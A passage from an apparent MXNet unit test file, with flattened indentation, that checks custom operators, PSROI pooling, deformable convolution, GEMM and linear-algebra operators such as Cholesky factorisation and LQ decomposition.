    if not sys.platform.startswith('win'):  # no fork on Windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
assert_raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
assert_raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
assert_raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
                    # use the builtin int: np.int is a deprecated (now removed) NumPy alias
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
                                # if the following condition holds, the sampling location is not differentiable,
                                # therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
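# Sketch of the bilinear interpolation deformable PSROI pooling samples with:
# the weights are piecewise linear in (h, w), so their derivative jumps at
# integer coordinates, which is why the validation above nudges such samples.
def _demo_bilinear_interp():
    feat = np.array([[0.0, 1.0], [2.0, 3.0]])
    h, w = 0.25, 0.75
    lh, lw = h - math.floor(h), w - math.floor(w)
    val = feat[0, 0] * (1 - lh) * (1 - lw) + feat[0, 1] * (1 - lh) * lw \
        + feat[1, 0] * lh * (1 - lw) + feat[1, 1] * lh * lw
    assert abs(val - 1.25) < 1e-12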
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
                    # use the builtin int: np.int is a deprecated (now removed) NumPy alias
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
    check_fw = lambda sym, location, expected: \
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
    rep_3x = lambda a, m, n: \
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from the other linalg operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
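    # MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION toggles whether float32 GEMM may
    # fall back to reduced-precision TensorCore math on supporting GPUs; the
    # looser tolerances below account for that (our reading of the env var).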
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
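# Builds a mask that keeps only the lower (or upper) triangle of the last two
# axes: the mask is assembled row by row from shifted one-hot rows, transposed
# for the upper-triangular case, and broadcast-multiplied onto the input.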
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
shape = (4, 4, 1, 1)
data_in = np.random.uniform(1, 10, shape)
# test potrf
        # Note: Have to symmetrize the input for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw(test_potrf, [data_in], [res_potrf])
if grad_check == 1:
check_grad(test_potrf, [data_in])
# test potri
ones = mx.nd.ones(shape).asnumpy()
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw(test_potri, [data_in], [res_potri])
if grad_check == 1:
check_grad(test_potri, [data_in])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw(test_trsm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trsm, [trian_in,data_in])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw(test_trmm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trmm, [trian_in, data_in])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw(test_sumlogdiag, [data_in], [res_sumlogdiag])
if grad_check == 1:
check_grad(test_sumlogdiag, [data_in])
# more elaborate example of Cholesky factorization
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
low_trian = trian
if not lower:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw(test_potrf, [a], [r])
if grad_check == 1:
check_grad(test_potrf, [a])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw(test_potri, [a], [r])
if grad_check == 1:
check_grad(test_potri, [a])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw(test_trsm, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm, [a, b])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw(test_trsm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm2, [a, b])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw(test_trsm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm3, [a, b])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw(test_trsm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm4, [a, b])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw(test_trmm, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm, [a, b])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw(test_trmm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm2, [a, b])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw(test_trmm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm3, [a, b])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw(test_trmm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm4, [a, b])
# test sumlogdiag
a = rep_3x(pow, 4, 4)
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw(test_sumlogdiag, [a], [r])
if grad_check == 1:
check_grad(test_sumlogdiag, [a])
# Tests for operators linalg.syrk, linalg.gelqf
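# For an LQ factorization A = L * Q with orthonormal rows of Q, the two outputs
# of the combined symbol below should equal (I, A); the tests check exactly that.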
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
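# For a symmetric A whose syevd gives eigenvectors as the rows of U and
# eigenvalues lam, the two outputs below are U * U^T = I and
# U^T * diag(lam) * U = A; the tests compare against exactly that.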
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
    # Currently disabled on GPU as they need CUDA 8
    # while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
